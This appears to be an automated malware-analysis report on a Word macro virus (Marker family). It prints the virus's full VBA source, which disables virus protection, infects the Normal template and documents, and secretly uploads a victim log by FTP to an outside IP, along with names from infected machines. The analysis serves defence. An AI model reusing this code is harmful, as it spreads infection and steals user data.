MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample is a macro-enabled Word document that uses VBA to execute malicious code. The VBA script attempts to write a second-stage payload to disk at 'c:\hsf*.sys' and 'c:\netldx.vxd', and connects to the IP address '209.201.88.110'. The document body presents a seemingly legitimate registration form to lure the user into opening the malicious content.
Heuristics 5
-
ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-31
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide -
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x40 bytes
Disassembly
Attempted x86 opcode disassembly0000227E 40 inc eax 0000227F 40 inc eax 00002280 40 inc eax 00002281 40 inc eax 00002282 40 inc eax 00002283 40 inc eax 00002284 40 inc eax 00002285 40 inc eax 00002286 40 inc eax 00002287 40 inc eax 00002288 40 inc eax 00002289 40 inc eax 0000228A 40 inc eax 0000228B 40 inc eax 0000228C 40 inc eax 0000228D 40 inc eax 0000228E 40 inc eax 0000228F 40 inc eax 00002290 40 inc eax 00002291 40 inc eax 00002292 40 inc eax 00002293 40 inc eax 00002294 40 inc eax 00002295 40 inc eax 00002296 40 inc eax 00002297 40 inc eax 00002298 40 inc eax 00002299 40 inc eax 0000229A 40 inc eax 0000229B 40 inc eax 0000229C 40 inc eax 0000229D 40 inc eax 0000229E 40 inc eax 0000229F 40 inc eax 000022A0 40 inc eax 000022A1 40 inc eax 000022A2 40 inc eax 000022A3 40 inc eax 000022A4 40 inc eax 000022A5 40 inc eax 000022A6 40 inc eax 000022A7 40 inc eax 000022A8 40 inc eax 000022A9 40 inc eax 000022AA 40 inc eax 000022AB 40 inc eax 000022AC 40 inc eax 000022AD 40 inc eax 000022AE 40 inc eax 000022AF 40 inc eax 000022B0 ffc4 inc esp 000022B2 00d3 add bl, dl 000022B4 0001 add byte ptr [ecx], al 000022B6 0002 add byte ptr [edx], al 000022B8 0203 add al, byte ptr [ebx] 000022BA 0101 add dword ptr [ecx], eax 000022BC 0000 add byte ptr [eax], al 000022BE 0000 add byte ptr [eax], al 000022C0 0000 add byte ptr [eax], al 000022C2 0000 add byte ptr [eax], al 000022C4 0000 add byte ptr [eax], al 000022C6 0107 add dword ptr [edi], eax 000022C8 06 push es 000022C9 0802 or byte ptr [edx], al 000022CB 0405 add al, 5 000022CD 0309 add ecx, dword ptr [ecx] 000022CF 1001 adc byte ptr [ecx], al 000022D1 0001 add byte ptr [ecx], al 000022D3 0302 add eax, dword ptr [edx] 000022D5 020406 add al, byte ptr [esi + eax] 000022D8 07 pop es 000022D9 120b adc cl, byte ptr [ebx] 000022DB 05 .byte 0x05 000022DC 07 pop es 000022DD 02 .byte 0x02
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7272 bytes |
SHA-256: 5fd49a440b3c0ea4d05449a7d979a7e506c1ef5c3fc174d2988f88304d3f436d |
|||
|
Detection
ClamAV:
Doc.Trojan.Marker-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
If DocumentInfected = True Then
LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
ElseIf NormalTemplateInfected = True Then
LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If
LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
For i = 1 To 4
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
LogFile = "C:\hsf" & LogFile & ".sys"
Open LogFile For Output As #1
Print #1, LogData
Close #1
Open "c:\netldx.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "ascii"
Print #1, "put " & LogFile
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
'Infect the NormalTemplate
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
'Write a log file of this NormalTemplate infection
For i = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
End If
Else
UserAddress = UserAddress & Chr(13) & "' "
End If
Next i
OurCode = OurCode & Chr(13) & _
"' " & Format(Time, "hh:mm:ss AMPM - ") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & UserAddress & Chr(13)
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString OurCode
If SaveNormalTemplate = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplateInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SaveDocument = ActiveDocument.Saved
OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString OurCode
If SaveDocument = True Then ActiveDocument.Save
End If
End If
End Sub
' Logfile -->
' 09:08:36 - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'
' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'
' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'
' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'
' 03:07:26 PM - Tuesday, 22 Dec 1998
' BCBSA
'
' 03:28:02 PM - Wednesday, 6 Jan 1999
' BCBSA
'
' 02:59:47 PM - Monday, 11 Jan 1999
' Marsha Veach
'
' 01:54:54 PM - Wednesday, 20 Jan 1999
' Connie Sandifer, CMP
'
' 09:33:06 PM - Monday, 25 Jan 1999
' Doug Rowan
'
' 08:21:12 AM - Wednesday, 27 Jan 1999
' IMSI
'
' 10:59:58 AM - Friday, 29 Jan 1999
' Raj
'
' 03:37:57 PM - Saturday, 30 Jan 1999
' hornd
'
' 01:26:48 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'
' 04:57:29 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'
' 06:35:44 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'
' 04:23:52 PM - Thursday, 4 Feb 1999
' Cooley Godward
'
' 04:27:39 PM - Saturday, 6 Feb 1999
' Cooley Godward
'
' 06:18:06 PM - Monday, 8 Feb 1999
' Cooley Godward
'
' 09:17:17 PM - Tuesday, 9 Feb 1999
' hclee
'
' 04:44:45 PM - Wednesday, 17 Feb 1999
' Dr. W. Hsiao
' Wendy Hsiao, Ph.D.
' 04:13:19 PM - Tuesday, 23 Feb 1999
' CCST
'
' 10:09:35 AM - Saturday, 20 Mar 1999
' cpwu
'
' 09:33:49 AM - Thursday, 6 May 1999
' 柳建华
'
' 12:39:25 PM - Tuesday, 20 May 1997
' ghc-bbc
'
' 01:21:36 PM - Friday, 7 May 1999
' 李晋闽
'
' 05:51:53 - Wednesday, 12 May 1999
' qdzhuang
'
' 03:23:04 PM - Saturday, 19 Jun 1999
' 李晋闽
'
' 02:53:46 下午 - Tuesday, 6 Sep 2011
' 李晋闽
'
' 09:37:47 上午 - Monday, 19 Sep 2011
' 张士力
'
' 01:41:54 下午 - Monday, 26 Sep 2011
' unknown
'
' 10:50:02 上午 - Wednesday, 19 Oct 2011
' 祝昊泉
'
' 08:27:05 上午 - Wednesday, 26 Oct 2011
' 迟文倩
'
' 10:37:36 上午 - Monday, 31 Oct 2011
' 蒋运枫
'
' 04:21:38 下午 - Monday, 31 Oct 2011
' 李彩梅
'
' 08:15:53 上午 - Wednesday, 2 Nov 2011
' 张会芳
'
' 02:57:58 下午 - Thursday, 3 Nov 2011
' unknown
'
' 04:00:59 下午 - Thursday, 3 Nov 2011
' 田敏
'
' 09:41:48 上午 - Friday, 4 Nov 2011
' 钟虹
'
' 11:18:07 上午 - Monday, 7 Nov 2011
' unknown
'
' 03:01:17 下午 - Monday, 21 Nov 2011
' unknown
'
' 09:59:34 上午 - Wednesday, 28 Dec 2011
' unknown
'
' 11:26:57 上午 - Wednesday, 22 Feb 2012
' unknown
'
' 09:22:07 上午 - Monday, 30 Apr 2012
' 梁小兵
'
' 10:07:34 上午 - Monday, 7 May 2012
' 20068726
'
' 11:29:21 上午 - Friday, 1 Jun 2012
' 20066938
'
' 07:19:38 PM - Sunday, 3 Jun 2012
' User
'
' 04:24:06 下午 - Friday, 8 Jun 2012
' 20065673
'
' 11:01:27 上午 - Friday, 15 Jun 2012
' 贵大学生资助管理中心
'
' 11:12:24 上午 - Tuesday, 6 May 2014
' User
'
' 04:41:18 下午 - Thursday, 15 May 2014
' User
'
' 10:18:56 上午 - Tuesday, 20 May 2014
' User
'
' 08:56:37 上午 - Monday, 26 May 2014
' User
'
' 03:09:44 下午 - Monday, 26 May 2014
' Windows 用户
'
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.